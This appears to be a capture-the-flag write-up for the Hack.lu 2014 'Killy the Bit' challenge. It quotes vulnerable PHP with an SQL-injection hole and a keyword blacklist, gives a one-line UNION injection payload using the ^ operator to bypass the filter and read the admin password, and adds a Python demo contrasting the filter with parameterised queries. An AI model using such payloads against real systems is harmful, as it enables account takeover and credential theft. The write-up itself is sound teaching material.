Thursday, October 23, 2014

HACK.LU CTF 2014: KILLY THE BIT

Killy the Bit is one of the dangerous kittens of the wild west. He already flipped bits in most of the states and recently hacked the Royal Bank of Fluxembourg. All customers of the bank are now advised to change their password for the next release of the bank's website which will be launched on the 23.10.2014 10:01 CEST.
Killy the Bit stands in your debt and sent the following link. Can you break the password generation process in order to get access to the admin account?

Hints were also given:

Hint: Blind SQLi is not a good solution. You can get the correct and complete flag with one single request!

(Published on 2014-10-21 22:42:29)

Hint: The password's column name is 'passwd'.

(Published on 2014-10-21 16:27:33)

The challenge won't actually send emails - just concentrate on the website

We are given the source code, with an obvious SQL injection:

<?php
$res = mysql_query("SELECT name,email FROM user where name='".$_GET['name']."'");
?>

But there is a check:

<!-- blind? we will kill you :) -->
<?php
if(isset($_GET['name']) && $_GET['name']!='' && !preg_match('/sleep|benchmark|and|or|\||&/i',$_GET['name'])) {
    // ... the query above is only run when the name passes this blacklist
}
?>

We cannot use OR, XOR, AND, SLEEP, BENCHMARK, |, ||, &, &&. There is more: if the username is found, the password is generated; otherwise it searches for a user whose name is similar using "sounds like".


With a bit of creativity, we can use ^ (the bitwise XOR operator), which the blacklist does not cover:


admin' ^ name='admin' union select passwd,1 from user where name='admin' limit 200 offset 1 --



Note: the hint gives the column name, "passwd". This matters because the blacklist regex matches "or" as a substring, so a column named "password" could not be referenced at all.
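The following is an added example, not code from the challenge or the write-up. It ports the challenge's blacklist regex to Python to show which inputs it blocks and which it lets through (the payload above, and the column name "passwd" versus "password"), and then contrasts the string-concatenated query from the challenge with a parameterised query against a constructed in-memory SQLite table, where the same input is bound as a plain value and matches nothing. The table contents, function names and the `lookup_user_safe` helper are assumptions for this demonstration; the injected query is only built as a string, never executed.

```python
import re
import sqlite3

# Port of the blacklist from the challenge source: same pattern, case-insensitive.
BLACKLIST = re.compile(r'sleep|benchmark|and|or|\||&', re.IGNORECASE)

# The payload from the write-up (MySQL syntax; only inspected here, not run).
PAYLOAD = ("admin' ^ name='admin' union select passwd,1 from user "
           "where name='admin' limit 200 offset 1 -- ")


def passes_filter(name):
    """Mirror of the PHP check: non-empty and no blacklisted substring."""
    return name != '' and BLACKLIST.search(name) is None


def build_vulnerable_query(name):
    """String concatenation exactly as in the challenge source.

    Returned only so the reader can see the resulting SQL text; a real
    application must never execute a query assembled this way.
    """
    return "SELECT name,email FROM user where name='" + name + "'"


def make_demo_db():
    """Constructed sample data (not from the challenge) in an in-memory SQLite DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, email TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", [
        ("admin", "admin@example.test", "constructed-admin-passwd"),
        ("alice", "alice@example.test", "constructed-alice-passwd"),
    ])
    return conn


def lookup_user_safe(conn, name):
    """Parameterised version of the lookup: the driver binds `name` as a value,
    so operators such as ^ or UNION inside it are just characters of the string."""
    cur = conn.execute("SELECT name, email FROM user WHERE name = ?", (name,))
    return cur.fetchall()


if __name__ == "__main__":
    for candidate in ["admin", "admin' or '1'='1", "password", "passwd", PAYLOAD]:
        print(f"{'pass' if passes_filter(candidate) else 'BLOCK':5} {candidate!r}")
    print(build_vulnerable_query(PAYLOAD))
    db = make_demo_db()
    print(lookup_user_safe(db, "admin"))   # one row
    print(lookup_user_safe(db, PAYLOAD))   # no rows: the payload is just a name
```

The blacklist blocks the obvious `OR`/`AND` forms (and, incidentally, the word "password"), but the XOR operator `^`, `UNION`, `SELECT` and comment sequences are all untouched, so the filter only narrows the attacker's vocabulary. The parameterised lookup removes the problem entirely: the user-supplied name is never parsed as SQL, so no keyword list is needed.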
